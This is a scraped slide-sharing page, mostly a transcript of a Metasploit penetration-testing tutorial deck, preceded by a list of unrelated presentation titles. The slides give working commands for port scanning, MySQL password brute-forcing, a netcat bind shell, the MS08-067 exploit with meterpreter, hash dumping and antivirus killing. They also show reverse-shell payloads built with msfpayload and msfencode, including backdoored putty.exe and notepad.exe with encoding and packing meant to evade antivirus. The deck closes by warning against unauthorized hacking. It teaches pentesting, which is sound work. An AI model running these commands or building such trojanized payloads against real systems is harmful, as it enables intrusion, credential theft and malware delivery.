The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 

Último (20)

QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 

Metasploit: Pwnage and Ponies

  • 1. The Metasploit Framework ● Vast collection of exploits, payloads and encoders. ● Modules for vulnerability scanning and information gathering. ● Modules for exploitation and session management. ● Modules for post exploitation, pivoting and getting all up in ur base.
  • 2. Basics Exploits and Payloads By exploiting part of a system you interact with it in a manner not anticipated by the developers with the end goal of getting your own code(payload)/logic to execute. Pentesting == Legal Le Hacking ● PTES ● Watered down process ○ Information Gathering ■ port scans, service enumeration, mapping the attack vector. ■ Testing payloads against AV, making sure everything is ready. ○ Exploitation ■ Attacking hosts. ■ Compromise from any angle. ○ Post Exploitation ■ Pivot -> back to information gathering -> Exploitation ● This time should be faster ● Password re-use ● Passwords to crack ● pass the hash/token ● You might already have DA, so just go and find what you're after.
  • 3. Different kinds of Pentest ● Web Applications ○ See OWASP ○ SQLi, XSS, Csrf, directory traversal, broken authentication, session management, access controls, reflected attacks, breaking application logic, client side attacks, information disclosure ● Footprint ○ What hosts/services are visible to public networks, information disclosure, forgotten hosts, incorrectly configured hardware. ● Infrastructure ○ Attacking hosts on a network, often internal to an organization or hosts found during the footprint. ○ Targeting hosts - OS and services (out dated/unpatched), weak password, incorrectly configured applications, zero days. ○ Targeting infrastructure - Routers and switches, IDS/IPS capabilities
  • 4. nmap primer ● nmap is a port scanner and OS/service fingerprinting tool. ● It has become even more, welcome the NSE ○ Vuln checking and much more. Basic Scanning: nmap -sS 10.0.0.1-100 -p80 nmap -sS -O -A 10.0.0.55 nmap -oX - 10.0.0.1/24 In msfconsole (once you have a database connected) msf > db_connect <username>:<password>@127.0.0.1/my_msf_db Check that you are connected by using: msf > db_status db_nmap <options>
  • 5. Interacting with Metasploit msfconsole Most used, feature rich, well supported. This is where the magic happens, make sure you run it as root. root@bt5:/# msfconsole msf > msfcli Focused towards scripting and interaction with other command line tools. Sexy one liners. armitage The metasploit GUI, nice for fuzzing but lets stick to msfconsole. Some of the other components you might use: msfpayload, msfencode, msfvenom Other bits of awesome: karmasploit, SET, Wmap
  • 6. Metasploit DB First create a user and database root@bt5:/# su postgres postgres@bt5:/# createuser foobar -P Enter password for new role: Enter it again: Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n postgres@bt5:/# createdb --owner=foobar foo_db Then in msfconsole conenct to the database msf > db_connect foobar:<password>@127.0.0.1/foo_db From now on you can work with the database in msfconsole, db_nmap will save nmap results to the database automaticly
  • 7. Basic Commands ● use <module> ○ info ○ show options ○ set <option> <value> ● show ○ payloads ○ exploits ○ auxiliary ○ options ● search ○ string that will make your day, "show vnc" ● back
  • 8. Brute Force Attacks Lets do a brute force dictionary attack on mysql server(s) First step is to find hosts running mysql nmap -sV -p3306 --open <IP Range> If that returns some hosts, you can target a specific one or if your lazy, skip the nmap scan and do it directly with the metasploit mysql login scanner msf > use auxiliary/scanner/mysql/mysql_login msf > set USERPASS /home/me/short.txt msf > set RHOSTS <IP || Range> msf > exploit
  • 9. Shellz A shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel. Bind Shell A bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (or anyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exe Reverse Shell Creates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT, this would stop you in your tracks if you tried to create a bind shell (unless you had already compromised their router and setup port forwarding). So if your target does not have a publicly accessible IP (but you do) use a reverse shell. NAT lolwut Meterpreter Shell The meta interpreter is a payload that provides complex and advanced functionality, all functions loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of built in features that will save you a lot of time and effort. Some useful meterpreter commands are covered later, use the following for navigating sessions. meterpreter > background msf > sessions msf > sessions -i <session #>
  • 10. The Art of Exploitation Information Gathering msf > db_nmap -sS -O -A 192.168.24.134 Now lets check for MS08-067 since its running XP < sp 3 msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134 msf > vulns
  • 11. The Art of Exploitation Confirming vulnerability, ready exploit msf > vulns showed us that the host was indeed vulnerable [*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008- 4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34476 Time to use our first exploit, first search for it: msf > search ms08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption Time to load the exploit: msf > use exploit/windows/smb/ms08_067_netapi Use show options || payloads to see the configuration options available. msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > show payloads
  • 12. The Art of Exploitation Configure the exploit msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134 RHOST => 192.168.24.134 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options Everything looks good, now run the exploit
  • 13. The Art of Post Exploitation Meterpreter commands of interest: meterpreter > hashdump meterpreter > shell Current user, working directory and process ID meterpreter > getuid meterpreter > pwd meterpreter > getpid Now you can migrate to a more reliable process, although not really necessary in this case meterpreter > ps meterpreter > migrate <pid> Some fun meterpreter > screenshot meterpreter > run vnc meterpreter > run killav
  • 14. MSFpayload Used to create payloads on their own, sharing is caring. msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload to launch in a separate thread (does not work with all executables, test, test, test) root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
  • 15. Multi-handler ● You have a payload ● The user will execute it (or you might) How do you handle the connection? ● Welcome to the multi-handler. root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15 LPORT=6666 E [*] Please wait while we load the module tree... [*] Started reverse handler on 10.0.0.15:6666 [*] Starting the payload handler... [*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129) C:Documents and SettingsAdministratorMy DocumentsPron Downloads> :) Make sure the payload matches the one you created with msfpayload
  • 16. MSFencode ● Anti-Virus Evasion ● IDS Evasion ● Taking care of bad characters in your shellcode ○ x00 and xff Show list of encoders: msfencode -l when in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the only encoder that has been rated Excellent. You can have multiple encoding runs: msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | ... Keep on Shuffling ... | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
  • 17. Hiding in plain sight Custom Executable Templates ● msfpayload embeds payload into a default executable template (data/templates/template.exe) ● While this template does change from time to time, AV companies check it. ● You can however use any windows executable in place of the default. ○ Use the -x option msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o /var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5 Packers Tool that compresses an executable and combines it with decompression code. root@bt:/# upx -5 /var/www/payload.exe
  • 18. Don't be stupid Pwnage is awesome ● getting shellz rock. ● realising you have remote code execution in a service is better than coke. ● Dumping hashes and cracking them makes you laugh. Getting caught is kak ● and you will get caught *cough* Sabu *cough* if you mess with systems without authorization. ● Having Bubba as a cellmate WILL be uncomfortable. ● No one likes a show off. ● Getting kicked out of university is counter productive and ill advised. ● So... DON'T BE STUPID
  • 19. Don't be stupid Bubba loves ponies, you don't want to be a pony...